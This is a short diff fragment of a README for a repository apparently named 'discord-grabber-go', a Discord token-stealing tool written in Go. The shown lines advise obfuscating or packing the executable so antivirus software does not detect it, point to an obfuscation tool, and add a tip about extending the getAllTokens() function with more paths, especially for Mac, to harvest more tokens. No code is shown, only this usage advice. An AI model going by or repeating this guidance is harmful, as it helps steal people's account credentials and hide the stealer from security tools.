faceslog/discord-grabber-go/README.md

 ```
 You should probably obfuscate or pack the executable file to avoid being detected by AVs.
 You can check out: https://github.com/burrowers/garble

+You can also add more path to check for a token especially for Mac in the `func getAllTokens()` line ~205

 ### Contributing